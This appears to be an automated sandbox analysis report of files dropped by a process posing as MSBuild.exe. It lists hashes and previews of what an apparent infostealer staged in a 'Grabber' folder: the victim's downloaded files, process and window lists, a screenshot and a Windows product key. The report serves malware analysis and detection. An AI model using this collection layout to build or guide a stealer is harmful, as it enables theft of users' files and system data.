Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.696913287597031
Encrypted:	false
SSDEEP:	24:TEp0dGAR5tKV4V1dnQcncjGi20QoVwGQqh3:20Iw5tKOncjGUwra
MD5:	44ECF9E98785299129B35CBDBCAB909B
SHA1:	4D92AFB00FE614CC8B795F1AF28173DBE76FE7F5
SHA-256:	06E706536CB7D543E6068C98C90721CAD89C23D16D37444F46F9B01C4380DF9E
SHA-512:	1FA347223014BB3AC0106948B07E337B1A98C0BA2D98AC0ADD821D1B3CE9F75681F6383925F5E614F36750C5B9FB92D1C8EEEDC05469FBC6EA3F281D8B52B556
Malicious:	false
Preview:	SFPUSAFIOLDMTRNUTGNTJUWFCWSZSHWEDVXRKVRQQJURAYWLWUUBTIKENFOXKWAEIMQEIZNZNRADQPATZGCMDPRDXLQGZUFJZGZDRTSVNCHAUPMRLPRPZKGVAVXYEVCKEHKMMJGKSJOOUYGYLDDIEYHRSUUPROPBGJMTERPOAVKYFPSCESRJNQZFKBQPUDQDDUMCFWKLZTOAKIRCBYNHNUNDHQGUCZFGLFAWYRAYVDHRMGQXAXAOYSCNPGEKEPCMQBIHRFANOHHAWKRVIORZYSDKULQZFRPSGFVYRDRVLMMPKWJDXUOEBNLILNONKXLMXLVIUCYNNQGCPDXMGSCUEKRTGZJHMNRUEKEIJFJIAHVLHOVPEFBBLWOKZSZSYSSOQIMAXYTLNUMGPOHCVAJUEBTRJRPRJCOTKTDCOEZCJXDLESVDTKVOFQWENRQDQXACWTCILXCPGHHUNHJNQLPPCERJAOCZFIXIHZKTCKZMXYDXVVFZUURETLUVBDNYJHWBIGQTEBATUDWNJLGPYCGIXUBQTVJPDRWVOFIQDYMJOMWUQUNCHQWGETEEEIJZNHHUYACVFRBGSWATTYVHFTURPBDTDDQTWASRBMLCMLRKIGMHWRHHHUVZTGIFNIDBHRKNFOYFIOYERMIXFEIANSZHVUVBFJOQNNJGQUNDLTPKRMYXNUHBOFQLLIDRDFMIAAVQNNXFNDRFBIGEVUSBEJUVVSTEJYKSAUCFDNNJQTSVXAUBHAPFHJIYCNFJQPWEXKMUQRCKERPSFCQKHEDKHHRNWTLAMXHJLOSIZOKYIMDHNEIBAUBKXVXZVXMAZNFTTYQGDGZHKLIHZJNIVHVZHYMNESIMFITKHGIPXKXZDBLBTKTNZDKZTKDHQQJCJDTRVKOCTCXPMDLKSOBGZSQQUTNFYYEOCJVZSZUSESOBKMIJSKKSXTXITISLBTMALAVZEMHXQXVRBZCDKLOKWDYQIEQCKFLKBMPLIQMKDTJPRHOW

C:\Users\user\AppData\Local\4f56288dfbc9a5af15947e7b835589a8\user@960781_en-CH\Grabber\DRIVE-C\Users\user\Downloads\SQSJKEBWDT.png

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.698473196318807
Encrypted:	false
SSDEEP:	24:yRweZ+GANSA1E8ftV/VhmiY4WFk1Mu7mtKmj1KVVrsfmbG:abZ+X1E8lVNhmNA1P76KmxKamK
MD5:	4D0D308F391353530363283961DF2C54
SHA1:	59DC2A289D6AB91E0CBD287A0F1D47E29BAE0C07
SHA-256:	6D4D77F7AD924168358F449E995C13B1072F06F7D8A464C232E643E2BD4DFF09
SHA-512:	DBF8C59E10706B4E220A6F15ADF4E4BAC5271F9477A5C32F8C61943A0A9318D50AD1A2E00E2BDF49DBA842B603545C49F9C36698802B3CDFE1F51FEC0C214B7A
Malicious:	false
Preview:	SQSJKEBWDTQPYRJUMTXHILYOMMANPJPHHMRHFVWTZEPXAIAVKTSBZRYUTWHNFQIECJFXGKPUTVPJATJGMKUHXJODTESNRMMJTXWENSGOWPBKXVHEEJMAGWUGYELOFGDDMEXBMBPCQOZDIQJHWWTSSVNGZLVHCHBZNJSYUOTWAPZJKFXWFCXQUQCBQYKVYKKKLNXSSSSLGTAFUMEJNHNRUGIMMETQDZKJCJZPRVXTSJLLHAUIPPNLEBPEUBCKHAPQUFAGPBYQCGICNBXZSXWAJNTKCUOBGQDHMCHIJBTKFTHSCPEBQXTOJKUAWTWRXEPYUIVUBKOGJQVRNBCCKFIMUIRPTIPNOIKNYUBFQMLTBCEFKXWKFTLKOEFALEANNDBOMFEYCLJVLOGSDFYCVBHQLAHJAEUYVZUKKYJAFJZPGGRXWJYMLQJGLJJPLVWQZTEJZVFZAIXBTWSNPXWYEWJSPNEXNORNZGESIRMDWDAAOUYCCNJQHBKTFVBSDSYVEQCQSBURVVYQIWJIGTJQDEZYGUHFKDWPAZGTXJFCGXCCHSPAITPOYIKUIZLMXTHWETVEIEWMJFHZRXBWPEKERORJFPHCCESXPZRWMEWGFCALFMDGOIEYAUSWWMBCHUQFBDJAZGNOFCHHPWSPGMHXGUSYBEKNZGGOHLEYLHJOUACYWSDKSJOOWHEPLCCKEWYVGVDSYJISOXMVCTJOSETWHUFBVDRYYAHSNIHPIRACNMMCDXLNSSFMVYGREIDELWCRHNKSOHQZMWMXEQMSXGXGWJQEDVLZMOLCVOBDXALQOHTEQUQCXKBTZHLAPBTYYAAPCTPIOGNQTMUINQRWRUZPUNQRXBMEDXPKAFCNTHZHZNOSMHOZZDSRACZMUSFUZGUJWIHKQKPTYZQWGZAUVTCZBLLEBGRXXRHNYNRCEMXSYIJTSCGAJZWVATKNNHCIBGACCGABGJJVWJDJTYOTKQWITZPWLFTBKVEPEVHMSUDPVSVB

C:\Users\user\AppData\Local\4f56288dfbc9a5af15947e7b835589a8\user@960781_en-CH\Grabber\DRIVE-C\Users\user\Downloads\SUAVTZKNFL.jpg

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.69422273140364
Encrypted:	false
SSDEEP:	24:hdGRma8y0UOkmVb01yh9qfT+PsSMxto3vIcMhrzxYWSDHtj:hdGRma6bRh9rsFE/uhrOWSDHh
MD5:	A686C2E2230002C3810CB3638589BF01
SHA1:	4B764DD14070E52A2AC0458F401CDD5724E714FB
SHA-256:	38F526D338AC47F7C2CAB7AB654A375C87E51CC56B4FA09A7C5769E2FB472FFC
SHA-512:	1F2AA9D4B55B52C32EF0C88189256562B16DF13EEA0564BD7B47E45CC39279F39823033ADF95BBD9A50B4F35E417E418C4D20BBE14EF425EFF7134ECE05BEB3F
Malicious:	false
Preview:	SUAVTZKNFLPDUIKIPSQJDVGAPGXKDOHYHNOWHLTUYHUBPZNAGHXWSRGELNTTLWSOVKHBKQEKGENMQDFUYQEFPUMFVGFHNHBEYAAJVHSIYLSLGVZSSKYNEFOJGJXPWCGXOBRZVXDWDDKKLDGWVLNCMOJKBSBYFMTKILZOONEGLZWORUNOTXJNOTGXQTUBOXEFHVICNNYYHMRGCLTZLWQODATYJZBGFVEMSABDUIKNKVRGQOHHCSHZAJIYWZLGGZOOEOQBTEAFTXBQJIHRZBDRPFDGHVFGYZEIHFYVBPAXJYSLOTRVHEFEEWXUGJCOLFXEKSPFHBKQEHGPZADNNCAUYCTEDLFKZMZOQOADUCTDIOYKELVKGABHEMOSAYPWUUKTZHQNEQWLFATTPCULHLMBMEQVAXDFQNQLMLVOFTUTWLMJNLVNCRHTWUTJEEORGWISXALHDTNXRCWVMZRUEMSVOJYMENRHGVXXMGLOWYRFKZLPBZQMETPESMZPCJGYXVQSMCJXYEMMNKLPIXGOXOMQNYCFAEVPXDGOFEGSLWKBUOLRKXGTWDFUVGYFTOWQZAOIMQUZEELMCQWKUBEWGFDVXSXNGHPJNVDQHMPSSIFZTQLVBBHZOEGNPDAWAYLIRBWZHXRAXBBESYNRIRINAKLQMELNYRHRPKDBUCNSZOVHNTBCUYDQTGFWZJUCUZBHHXHQHKWOWTEWLUGGGWHIHCWZLLJPDFVDICZBBLFSECTLMQBKCPCHANOICKIUSVAJTYQOIUWRGVAFOFTMIHARUUCNGBLVFIKMTTGPYXNEVGLPMZDMIQDQOLIEFHNZYMZTCDOHBNQLNVLXRUXMGYCVOJDBWPSJKMFMEDBEMXULQBRVRKPYNUACCXNPGFEMPXDXNEIPTKGSKUMVFSLCTJFHNFATCDKSZWKYMVQNTVHCOAJXDUTJZESFLKTQOGREXBTBVBGLDYJYDTNEAQDFRTXMJIHJCCTPUDZLNKNEABFQYCDL

C:\Users\user\AppData\Local\4f56288dfbc9a5af15947e7b835589a8\user@960781_en-CH\Grabber\DRIVE-C\Users\user\Downloads\SUAVTZKNFL.pdf

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.69422273140364
Encrypted:	false
SSDEEP:	24:hdGRma8y0UOkmVb01yh9qfT+PsSMxto3vIcMhrzxYWSDHtj:hdGRma6bRh9rsFE/uhrOWSDHh
MD5:	A686C2E2230002C3810CB3638589BF01
SHA1:	4B764DD14070E52A2AC0458F401CDD5724E714FB
SHA-256:	38F526D338AC47F7C2CAB7AB654A375C87E51CC56B4FA09A7C5769E2FB472FFC
SHA-512:	1F2AA9D4B55B52C32EF0C88189256562B16DF13EEA0564BD7B47E45CC39279F39823033ADF95BBD9A50B4F35E417E418C4D20BBE14EF425EFF7134ECE05BEB3F
Malicious:	false
Preview:	SUAVTZKNFLPDUIKIPSQJDVGAPGXKDOHYHNOWHLTUYHUBPZNAGHXWSRGELNTTLWSOVKHBKQEKGENMQDFUYQEFPUMFVGFHNHBEYAAJVHSIYLSLGVZSSKYNEFOJGJXPWCGXOBRZVXDWDDKKLDGWVLNCMOJKBSBYFMTKILZOONEGLZWORUNOTXJNOTGXQTUBOXEFHVICNNYYHMRGCLTZLWQODATYJZBGFVEMSABDUIKNKVRGQOHHCSHZAJIYWZLGGZOOEOQBTEAFTXBQJIHRZBDRPFDGHVFGYZEIHFYVBPAXJYSLOTRVHEFEEWXUGJCOLFXEKSPFHBKQEHGPZADNNCAUYCTEDLFKZMZOQOADUCTDIOYKELVKGABHEMOSAYPWUUKTZHQNEQWLFATTPCULHLMBMEQVAXDFQNQLMLVOFTUTWLMJNLVNCRHTWUTJEEORGWISXALHDTNXRCWVMZRUEMSVOJYMENRHGVXXMGLOWYRFKZLPBZQMETPESMZPCJGYXVQSMCJXYEMMNKLPIXGOXOMQNYCFAEVPXDGOFEGSLWKBUOLRKXGTWDFUVGYFTOWQZAOIMQUZEELMCQWKUBEWGFDVXSXNGHPJNVDQHMPSSIFZTQLVBBHZOEGNPDAWAYLIRBWZHXRAXBBESYNRIRINAKLQMELNYRHRPKDBUCNSZOVHNTBCUYDQTGFWZJUCUZBHHXHQHKWOWTEWLUGGGWHIHCWZLLJPDFVDICZBBLFSECTLMQBKCPCHANOICKIUSVAJTYQOIUWRGVAFOFTMIHARUUCNGBLVFIKMTTGPYXNEVGLPMZDMIQDQOLIEFHNZYMZTCDOHBNQLNVLXRUXMGYCVOJDBWPSJKMFMEDBEMXULQBRVRKPYNUACCXNPGFEMPXDXNEIPTKGSKUMVFSLCTJFHNFATCDKSZWKYMVQNTVHCOAJXDUTJZESFLKTQOGREXBTBVBGLDYJYDTNEAQDFRTXMJIHJCCTPUDZLNKNEABFQYCDL

C:\Users\user\AppData\Local\4f56288dfbc9a5af15947e7b835589a8\user@960781_en-CH\Grabber\DRIVE-C\Users\user\Downloads\UOOJJOZIRH.docx

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.694311754777018
Encrypted:	false
SSDEEP:	24:A8RGU2wNw6pbc5fP6UBtRzjn+4sNp3GYuf5/4dImDNR4+R00JOGJP89a:Aw4w9h+fiUBtJj+44pc3mDL4+R0MVJ/
MD5:	61908250A5348CC047FF15260F730C2B
SHA1:	CBCF34156EAE25B328A926E21008598EE8D1CBDE
SHA-256:	8700BF8369D39FD5DF142F9482CE8860BD8A26A3304EFBC57CBF9E45782C7A3A
SHA-512:	BCAB9A36BF1111B05BC52D8921CAC19ABC0FA18D93EA4EB9866DF4B31624FFCA2FF55A09C5051DC2AECAB18828BA8FDA5F31FA0F1E1B7CDC51DF39041E2A82F3
Malicious:	false
Preview:	UOOJJOZIRHPVBWNJCWUSWUNTMYTRIXAVHMVNTYLIPCAYUDIDHLMFMKJROINQAVRXUZLNINNJJSHFEFPSZPLVVWBUDRECRECFHEVVEZDHIFPUKQTLDLWAAKNHNLRQDSPWEEVMZICDCINAORJHMIUUNNJHMWJLZHCNXQIZIPHJPLEDKWATEVYJSWRRMCEJGQXHFBOGXKHJFORHFMGMLTTZJKPJBYMKZVWGZAIGHCFNXGRNDDLJZMCZBXDTQVGPSMNLFNFDHXXCXDJJUNSVHDRBZEZFIUQIYSJVDHEFPPPROTSFKVYAURVOKTIKGYYSWJMCPHHISKCOIVXEIQWZICSWMZJVHXNBACFJZRIEQPOISHMZILEXPCMYBSQRASRNWPSMMYPWJFEXHUUJQAMZDZSIKVETWBZUQBTDCCOYIIJFYYHXPZIUCZRQQFYTKLLGWQPTPZJIZHUEFVCDUNPMVORWJRIAYGRRAHBFWKSAMTDEVSHQXJBHBMOINFGNSRFJDWPSMFABPWRZHIOIPNMLHKGNVWQJYVTWLEZDGMBOJLNHPJKWMHWBVAEGELRTQORSRZQBNXOXEHQJHOEQVNZZJSGWQGINLWNPWFSJNPGRBFOBAEJAOEEMVKZTQZEVVODQLWGPNPNOPXEXLEESZERAPVAPHAUNNCEHTNMFJYBTYGSNGBIEDWGUTNCJDESWGYITWPGBEFVMZYUYPQOQBFITFPUQTWZNQFLWVTMUIAOXBCINJDYCHTXVFQFJQSMNUTYABAAOGGEUKHMDYKLCSGIBIFQSYOIRBUYVSCPDGMVNAQBKZPEKHNRNDPIHOUUTPJDKDOACRPOMZOQCOIAOBNPJLJIYDLQLQUMPIRAMVWNBCMMWFDLTUGWRDVGNHOOODYTHAGWDMJKRVJZFYCVLFLQUWEILFSEPBEADHBHFVWZGUZKNXQCRSBRLGIVTWCSHGFTTTPQAKFWFDXDYXWAWDKWXXTMSJSVOBRAYZGGBDPJOGLIZ

C:\Users\user\AppData\Local\4f56288dfbc9a5af15947e7b835589a8\user@960781_en-CH\Grabber\DRIVE-C\Users\user\Downloads\desktop.ini

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	282
Entropy (8bit):	3.5191090305155277
Encrypted:	false
SSDEEP:	6:QyqRsioTA5wmHOlRaQmZWGokJqAMhAlt4DAlLwkAl2FlRaQmZWGokJISlVl9:QZsiL5wmHOlDmo0qmt4clLwr2FlDmo0d
MD5:	3A37312509712D4E12D27240137FF377
SHA1:	30CED927E23B584725CF16351394175A6D2A9577
SHA-256:	B029393EA7B7CF644FB1C9F984F57C1980077562EE2E15D0FFD049C4C48098D3
SHA-512:	DBB9ABE70F8A781D141A71651A62A3A743C71A75A8305E9D23AF92F7307FB639DC4A85499115885E2A781B040CBB7613F582544C2D6DE521E588531E9C294B05
Malicious:	false
Preview:	......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.9.8.....I.c.o.n.R.e.s.o.u.r.c.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.i.m.a.g.e.r.e.s...d.l.l.,.-.1.8.4.....

C:\Users\user\AppData\Local\4f56288dfbc9a5af15947e7b835589a8\user@960781_en-CH\Grabber\DRIVE-C\Users\user\Pictures\Camera Roll\desktop.ini

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	190
Entropy (8bit):	3.5497401529130053
Encrypted:	false
SSDEEP:	3:QJ8ql62fEilSl7lA5wXdUSlAOlRXKQlcl5lWGlyHk15ltB+SliLlyQOnJpJSl6nM:QyqRsioTA5wmHOlRaQmZWGokJD+SkLOy
MD5:	D48FCE44E0F298E5DB52FD5894502727
SHA1:	FCE1E65756138A3CA4EAAF8F7642867205B44897
SHA-256:	231A08CABA1F9BA9F14BD3E46834288F3C351079FCEDDA15E391B724AC0C7EA8
SHA-512:	A1C0378DB4E6DAC9A8638586F6797BAD877769D76334B976779CD90324029D755FB466260EF27BD1E7F9FDF97696CD8CD1318377970A1B5BF340EFB12A4FEB4A
Malicious:	false
Preview:	......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.w.i.n.d.o.w.s...s.t.o.r.a.g.e...d.l.l.,.-.2.1.8.2.4.....

C:\Users\user\AppData\Local\4f56288dfbc9a5af15947e7b835589a8\user@960781_en-CH\Grabber\DRIVE-C\Users\user\Pictures\Saved Pictures\desktop.ini

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	190
Entropy (8bit):	3.5497401529130053
Encrypted:	false
SSDEEP:	3:QJ8ql62fEilSl7lA5wXdUSlAOlRXKQlcl5lWGlyHk15ltB+SliLlyQOnJpJSl3sY:QyqRsioTA5wmHOlRaQmZWGokJD+SkLOO
MD5:	87A524A2F34307C674DBA10708585A5E
SHA1:	E0508C3F1496073B9F6F9ECB2FB01CB91F9E8201
SHA-256:	D01A7EF6233EF4AB3EA7210C0F2837931D334A20AE4D2A05ED03291E59E576C9
SHA-512:	7CFA6D47190075E1209FB081E36ED7E50E735C9682BFB482DBF5A36746ABDAD0DCCFDB8803EF5042E155E8C1F326770F3C8F7AA32CE66CF3B47CD13781884C38
Malicious:	false
Preview:	......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.w.i.n.d.o.w.s...s.t.o.r.a.g.e...d.l.l.,.-.3.4.5.8.3.....

C:\Users\user\AppData\Local\4f56288dfbc9a5af15947e7b835589a8\user@960781_en-CH\Grabber\DRIVE-C\Users\user\Pictures\desktop.ini

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	504
Entropy (8bit):	3.514398793376306
Encrypted:	false
SSDEEP:	12:QZsiL5wmHOlDmo0qmalDmo0qmN4clLwr2FlDmo0IWFSklrgl2FlDmo0qjKA1:QCGwv4o0u4o0RhlLwiF4o0HUsF4o01A1
MD5:	29EAE335B77F438E05594D86A6CA22FF
SHA1:	D62CCC830C249DE6B6532381B4C16A5F17F95D89
SHA-256:	88856962CEF670C087EDA4E07D8F78465BEEABB6143B96BD90F884A80AF925B4
SHA-512:	5D2D05403B39675B9A751C8EED4F86BE58CB12431AFEC56946581CB116B9AE1014AB9334082740BE5B4DE4A25E190FE76DE071EF1B9074186781477919EB3C17
Malicious:	false
Preview:	......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.7.9.....I.n.f.o.T.i.p.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.1.2.6.8.8.....I.c.o.n.R.e.s.o.u.r.c.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.i.m.a.g.e.r.e.s...d.l.l.,.-.1.1.3.....I.c.o.n.F.i.l.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.....I.c.o.n.I.n.d.e.x.=.-.2.3.6.....

C:\Users\user\AppData\Local\4f56288dfbc9a5af15947e7b835589a8\user@960781_en-CH\System\Process.txt

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	16598
Entropy (8bit):	5.660511038178569
Encrypted:	false
SSDEEP:	192:6CHDuKxRMViT9vZ4GNwZ6if4GZTWgMVqJdsA7e/kSoGpNGWUIJJ7L+z90GlcOrn+:NuOFZY5VDM0Mfp
MD5:	B4D5056E763C011708C0A6792DC3918B
SHA1:	C6B2D9FECC871E6427D99A818555D35E5392355B
SHA-256:	881CA6DDB4CBE2C112E37E1C0B2ED62FDD0C8395790A22402EB834213FF5B4B7
SHA-512:	5073095C55DA0DCDFAF79C5D9583F040DC9A584BFDB4C0FDD223A44662DE63EFEB0AC0695C7C321358DC278975F5B0A1657AD7897BD35094D4CAB2FB61A6F3ED
Malicious:	false
Preview:	NAME: DKVJpeiSaUn..PID: 1292..EXE: C:\Program Files (x86)\nquHcDysriKVjqmEAeMKZhczgWTylIgeRbdYpvDKPjGnRch\DKVJpeiSaUn.exe..NAME: svchost..PID: 2584..EXE: C:\Windows\system32\svchost.exe..NAME: DKVJpeiSaUn..PID: 3872..EXE: C:\Program Files (x86)\nquHcDysriKVjqmEAeMKZhczgWTylIgeRbdYpvDKPjGnRch\DKVJpeiSaUn.exe..NAME: svchost..PID: 1716..EXE: C:\Windows\system32\svchost.exe..NAME: RuntimeBroker..PID: 6456..EXE: C:\Windows\System32\RuntimeBroker.exe..NAME: OfficeClickToRun..PID: 2576..EXE: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe..NAME: StartMenuExperienceHost..PID: 4728..EXE: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe..NAME: svchost..PID: 2568..EXE: C:\Windows\system32\svchost.exe..NAME: svchost..PID: 1704..EXE: C:\Windows\System32\svchost.exe..NAME: csrss..PID: 408..EXE: ..NAME: ctfmon..PID: 3852..EXE: C:\Windows\system32\ctfmon.exe..NAME: conhost..PID: 5572..EXE: C:\Windows\system32\conho

C:\Users\user\AppData\Local\4f56288dfbc9a5af15947e7b835589a8\user@960781_en-CH\System\ProductKey.txt

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	29
Entropy (8bit):	3.9353986674667634
Encrypted:	false
SSDEEP:	3:leCNesE9xIjsn:1/E9P
MD5:	C68FDA4D79B839C3914F283C7E347694
SHA1:	5A4A68CD9BE9B42255CF645BC1B44D294A18D803
SHA-256:	39B214BCE6DDAD66A95E8406FC75DC34B70168E4885B36CCD90919B2E5FE6CEB
SHA-512:	727DFAD45E4FC850D8C84D765332D8FF80B3056AEFF1500AB88A1186F8028564B8A8282D8EDC9959B3D6D6FA3AFED08261368E98BC2E5860CD8A4BAEAB6BD21F
Malicious:	false
Preview:	Q9NPR-27Y9D-P49DH-J93XT-FP6QR

C:\Users\user\AppData\Local\4f56288dfbc9a5af15947e7b835589a8\user@960781_en-CH\System\ScanningNetworks.txt

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	84
Entropy (8bit):	4.6630509827051725
Encrypted:	false
SSDEEP:	3:PHsEiVboFkaQXMtS1ME/M2en:PsEwYVQXOS1TUn
MD5:	58CD2334CFC77DB470202487D5034610
SHA1:	61FA242465F53C9E64B3752FE76B2ADCCEB1F237
SHA-256:	59B3120C5CE1A7D1819510272A927E1C8F1C95385213FCCBCDD429FF3492040D
SHA-512:	C8F52D85EC99177C722527C306A64BA61ADC3AD3A5FEC6D87749FBAD12DA424BA6B34880AB9DA627FB183412875F241E1C1864D723E62130281E44C14AD1481E
Malicious:	false
Preview:	Active code page: 65001..The Wireless AutoConfig Service (wlansvc) is not running...

C:\Users\user\AppData\Local\4f56288dfbc9a5af15947e7b835589a8\user@960781_en-CH\System\Windows.txt

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	13096
Entropy (8bit):	5.6460202479125385
Encrypted:	false
SSDEEP:	192:65PFw8+dRSax11m8f8FF36ET5mCZIat2jcskK12ygQk133i2AA4bTaNMAOi2sddQ:5uFq
MD5:	FA985722733385E258198ADD60CCE8CB
SHA1:	00975B035FB92B4F94B98E8CD5AE96C706738769
SHA-256:	C904CDEBD2861F9EB4485BE09853F2E75AF0F8C2768A7CDF82B0F1431F21489D
SHA-512:	A333E8169DFFE23DD348C2DA0BBE585EAD15760B169C4A70EEDF3A4C3F63A6E5C58D87E3843C768F14A7B3F7EBB7FE34EC50CE194DC51C7A48D741874CEB39CE
Malicious:	false
Preview:	NAME: DKVJpeiSaUn..TITLE: New Tab - Google Chrome..PID: 1292..EXE: C:\Program Files (x86)\nquHcDysriKVjqmEAeMKZhczgWTylIgeRbdYpvDKPjGnRch\DKVJpeiSaUn.exe..NAME: DKVJpeiSaUn..TITLE: New Tab - Google Chrome..PID: 3872..EXE: C:\Program Files (x86)\nquHcDysriKVjqmEAeMKZhczgWTylIgeRbdYpvDKPjGnRch\DKVJpeiSaUn.exe..NAME: DKVJpeiSaUn..TITLE: New Tab - Google Chrome..PID: 828..EXE: C:\Program Files (x86)\nquHcDysriKVjqmEAeMKZhczgWTylIgeRbdYpvDKPjGnRch\DKVJpeiSaUn.exe..NAME: DKVJpeiSaUn..TITLE: New Tab - Google Chrome..PID: 6856..EXE: C:\Program Files (x86)\nquHcDysriKVjqmEAeMKZhczgWTylIgeRbdYpvDKPjGnRch\DKVJpeiSaUn.exe..NAME: DKVJpeiSaUn..TITLE: New Tab - Google Chrome..PID: 6852..EXE: C:\Program Files (x86)\nquHcDysriKVjqmEAeMKZhczgWTylIgeRbdYpvDKPjGnRch\DKVJpeiSaUn.exe..NAME: DKVJpeiSaUn..TITLE: New Tab - Google Chrome..PID: 6836..EXE: C:\Program Files (x86)\nquHcDysriKVjqmEAeMKZhczgWTylIgeRbdYpvDKPjGnRch\DKVJpeiSaUn.exe..NAME: DKVJpeiSaUn..TITLE: New Tab - Google Chrome..PID: 5964..EXE: C:\P

C:\Users\user\AppData\Local\4f56288dfbc9a5af15947e7b835589a8\user@960781_en-CH\System\WorldWind.jpg

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1280x1024, components 3
Category:	dropped
Size (bytes):	99230
Entropy (8bit):	7.884814799473333
Encrypted:	false
SSDEEP:	3072:dPb5fHTEo/+QjYO5p1mdmFK//o3yX098orLyoYKvcDDDVjyhK:dDlGQ8O0dmFK/kyXCxmoYKkDDDVj4K
MD5:	9DDE950ADAACF77FBFFA4DA710867A8B
SHA1:	8C4A8CA80B61BA2B137DF0E58A11B53126F4407B
SHA-256:	B160606686C35EF99E03F04D980EE77AFC0FA9D3E6F26DB378A918EDE9019E63
SHA-512:	548C25FD48D7B966DBE363C65631E01946A5E4BA11640B1FBF77824432F27D86C364ACA158C397581337B7A5BEF785550A24635171ECAC2BD732E8CC0CF92A70
Malicious:	false
Preview:	......JFIF.....`.`.....C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...(..?3...m..,.X.c.#....O..i.....w...._.#.z..p.....MR...%.f..r.....Uf.....?.2......S.]9o..s......T..W6.y.:.....CPWJi......%-....Z(.(..o.<-...OF.....j.#?........x..........#..........9.+..........e\.../n-.n.dh.c...k....1.q...y5..r..N.)W...O.d.QEw.!E.P11E-v.....Z..tN.Lo..?.Xb1....Oc....&...W.8.+.?.]._.....G.R....n..............z...........w..#.......`..

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Kh7W85ONS7.exe.log

Download File

Process:	C:\Users\user\Desktop\Kh7W85ONS7.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.34331486778365
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4x84qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4j:MIHK5HKH1qHxviYHKh3oPtHo6hAHKzea
MD5:	7B709BC412BEC5C3CFD861C041DAD408
SHA1:	532EA6BB3018AE3B51E7A5788F614A6C49252BCF
SHA-256:	733765A1599E02C53826A4AE984426862AA714D8B67F889607153888D40BBD75
